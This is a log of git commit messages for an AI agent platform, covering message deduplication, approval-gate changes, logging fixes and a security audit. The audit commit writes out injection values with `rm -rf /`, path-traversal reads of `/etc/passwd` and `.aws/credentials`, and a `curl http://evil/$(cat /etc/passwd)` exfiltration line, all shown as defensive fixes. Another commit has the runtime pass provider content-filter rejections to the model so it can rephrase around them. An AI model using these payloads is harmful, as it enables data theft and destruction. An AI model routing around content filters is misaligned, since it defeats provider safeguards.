Typed-3-shown-5 forensics (project 000): the WS client queues session_send
payloads while disconnected and flushes the queue after a reconnect, and the
server minted a fresh row id per delivery — so one typed message could land
as several user turns, each dispatched to the engine.
Every send now carries a client-generated ui_message_id (dispatchSessionSend
injects one when the caller didn't). The handler persists the user row under
that id and answers any later delivery in the same channel with an idempotent
ack instead of inserting and dispatching again. Because the row id now equals
the optimistic bubble's ui_message_id, the echo also merges with the local
message even after the transcript sync rewrites row metadata.
Same text intentionally sent again gets a fresh id and still starts a new turn.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Approval friction (harmless commands kept prompting):
- Persist "Allow for this session" grants to approval_allowlist.yaml under a
new sessions scope (capped LRU), hydrated lazily, so they survive `opc ui`
restarts and re-entering the session instead of living only in memory.
- Safe-prefix matching now accepts compound read-only commands: every segment
must match a safe prefix, and fd-duplication / /dev/null redirections
(2>&1, 2>/dev/null) no longer disqualify a command; real write redirections
(>, >>, <) still do. Default safe prefixes gain common read-only commands
(cd, cat, head, grep, git log, ...).
- First-use approval now gates only MEDIUM+ risk; heuristically LOW actions
proceed without a card.
- Shell-substitution detection flags eval/source only at command position of a
segment (no more false positives on `grep source file`); $(...) and
backticks still flag anywhere.
Approval card timeout redesign (deferred decisions):
- The card's structured approval context (action, allowlist patterns, scopes)
now travels through the escalation event into the persisted card metadata.
- Timeout without a default action no longer marks the card timed out, and the
session-detail reconciler no longer stales deferred-capable cards: the card
stays pending and clickable indefinitely, including across restarts.
- Clicking after the inline wait expired applies the allowlist grant
(approve-once grants the exact command at session scope), resolves the card,
and rewrites the reply to target the parked AWAITING_HUMAN checkpoint so the
task resumes through the normal message pipeline and the retried command
auto-approves. With no parked checkpoint the grant still lands and a helper
reply explains the state.
Verified: approval engine suite (40) incl. new deferred-decision and
compound-command tests, ws_handler + runtime suites green, real escalated
commands from project 999 replayed against the user's config now auto-approve
while pip install / $(...) / rm -rf / write redirects still prompt.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Deleting a project closed its store but left the delegate cached in
_project_engine_delegates; re-creating a same-name project then reused the
zombie engine and crashed in get_session. delete() now closes and evicts via
_close_project_engine_store (also covers non-active deletes), the delegate
cache self-heals when a cached store is closed, and _engine_for_project
reopens a closed store for the non-evictable root engine case.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Approval cards raised by company-mode internal scheduling turns (review/report
work items, session ids like `<root>:review::<wid>::vN`) were posted to the
turn's own session channel, which the UI deliberately hides. The card silently
timed out after 300s and the work item parked on AWAITING_HUMAN, so users saw
only the gate card and never the approval prompt. ws_handler now detects these
internal turns and routes their escalation cards to origin_task_id, the root
session's primary task channel, or the activity channel — never the hidden one.
Also unblocks the previously dead origin/session fallbacks in the resolver.
Unclassified LLM stream failures (e.g. provider content-filter rejections like
"input may contain sensitive information") used to hit a blind truncate-retry
loop that replayed the identical payload for a dozen-plus consecutive failures.
runtime_v2 now feeds the provider's verbatim error text back into the
conversation as a "[runtime notice]" system message so the model can adapt
(rephrase, drop quotes, change tack), bounded at 2 feedback retries (counter
resets on any successful stream) plus one context-reset attempt, then fails
honestly with the real error. The blind truncate path remains only for
classified tool-protocol errors.
Verified: new end-to-end tests for recover-after-notice and bounded-failure;
runtime_v2 + ws_handler + escalation/approval + company-mode suites all green.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Native agent progress panel (company mode):
- ws_handler: filter runtime bookkeeping noise (turn/status/member_inbox_updated),
keep tool_completed as tool_call, thinking summary previews content,
preserve raw thinking_delta fragments (no strip; skip whitespace-only)
- frontend progressLog: summarize thinking by content preview; merge thinking
by detail only so the 'Thinking' label never splices into text
- AgentProgressBlock: add bottom "Show more (N earlier steps)" toggle
ui_state.db "database is locked" hardening:
- ws_handler: isolate engine progress/kanban/runtime-event callbacks so UI
persistence failures never crash work items
- chat_store: busy_timeout, _retry_locked backoff, idempotent insert_message
(INSERT OR REPLACE), create_channel read-before-write to stop poll writes
- server: flock single-instance guard for `opc ui` per OPC home
Approval card duplicate-click bug:
- EscalationPanel: disable buttons on click with Submitting state and 30s
reconnect fallback
- ws_handler: stale-escalation branch checks real card status (new
chat_store.get_checkpoint_message); already-resolved cards get an accurate
"already handled (decision: X)" reply without being re-marked stale;
dedup identical helper messages within 120s to stop reply spam
Company mode prompt:
- add soft guidance that the runtime monitors state and re-activates roles,
so leaders need not poll work items after delegation/review
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Loguru has no exc_info kwarg: extra kwargs are str.format() arguments, so
logger.error(f"...{e}", exc_info=True) forces .format() on the rendered
message — any error text containing braces (e.g. a JSON error body) raises
KeyError FROM the log call itself, escaping the surrounding except block and
killing the caller (observed: whole agent turns dying in benchmark runs).
The intended traceback was also never logged, since exc_info is not a loguru
feature.
Batch fix of all 143 sites across 11 files:
logger.X(msg, exc_info=True) -> logger.opt(exception=True).X(msg)
(one exc_info=exc site -> opt(exception=exc))
Messages are byte-identical; with the kwarg gone loguru never calls
.format(), so brace-containing f-string messages are inert.
Verified: AST post-conditions per file, py_compile, import smoke of all
modules, behavioral equivalence of the 3 patterns, full unit suite (1549
passed) with a failure set identical to the pristine tree (22 pre-existing,
zero regressions).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Also add pixel-agents to the README acknowledgements.
A security and robustness audit of the tool-execution, market-package, and
approval subsystems surfaced several high-impact issues. Each is fixed with a
minimal, targeted change; regression tests are included.
Command injection (shell_exec runs `bash -lc "<cmd>"`, so interpolated args are
shell-evaluated):
- git_commit: the commit message was interpolated raw into the command string.
A message like `foo" && rm -rf / #` injected arbitrary commands, and the
approval layer never inspects `message`. Now shlex-quoted.
- git_clone: the URL was interpolated raw. `https://x.git; rm -rf /` or
`$(curl ...)` was executed. Now shlex-quoted.
Path traversal:
- package_loader._write_prompts / uninstall: `package_id` (from an untrusted
manifest) was used directly as a directory name under prompts/market and
passed to mkdir(parents=True) / shutil.rmtree. An id like
`../../projects/<victim>` enabled arbitrary file write and arbitrary
directory deletion. Added _market_prompts_dir() which validates the id
(lowercase alphanumeric + -/_) and confirms the resolved path stays inside
the market base; uninstall validates up front. Prompt-content filenames are
also confined to the package dir.
- sandbox_checker: a malformed package id was only a *warning*, so
report.passed stayed True and callers proceeded. Promoted to a hard error.
- package_exporter: prompt refs (bare strings from package definitions) were
read with `opc_home / ref`, so `/etc/passwd` or `../../.aws/credentials`
were bundled into exported packages. Now confined to opc_home.
- ws_handler._write_custom_prompt: employee_id (derived from user-supplied
role id/name) flowed unchecked into the path, enabling traversal writes.
Now reduced to a safe path component with a containment check.
Approval bypass:
- approval: a command beginning with a safe prefix (curl/echo/find/...) was
auto-approved as LOW risk even when it contained shell command substitution.
`curl http://evil/$(cat /etc/passwd)` was classified safe and ran with no
human/LLM review, letting bash exfil data. Added
_command_has_shell_substitution() and gated safe-prefix matching on it.
Correctness / robustness:
- shell: when a shell_prefix was active, `[args[0], args[1], command]` dropped
the `-Command` flag from PowerShell argv (4 elements), silently breaking
every prefixed PowerShell tool call. Now replaces only the trailing arg.
- runtime_v2: tool arguments that are valid JSON but not an object (e.g. a
JSON array) were silently replaced with `{}` while arguments_parse_error
stayed None, so the tool executed with empty args (todo_write could wipe the
task ledger). Now flagged with a parse error.
- store: _json_loads raised on corrupt JSON; it is called during
store.initialize() (via _sweep_stale_claims), so a single corrupt row
prevented the store from ever opening. Now falls back to the default.
- engine: _parse_reorg_payload returned any JSON type; callers did
`.get(...)` and crashed (AttributeError) on `reorg propose 42`. Now returns
None for non-dict JSON.
- channels.manager: a single failing channel.send propagated out of the only
outbound dispatch loop and silently stopped all message delivery on every
channel until restart. Now caught and logged.
- ws_handler: a non-object JSON frame (null/number/array/string) made
`data.get` raise AttributeError and drop the whole WS connection. Non-dict
frames are now ignored.
Co-Authored-By: Claude <noreply@anthropic.com>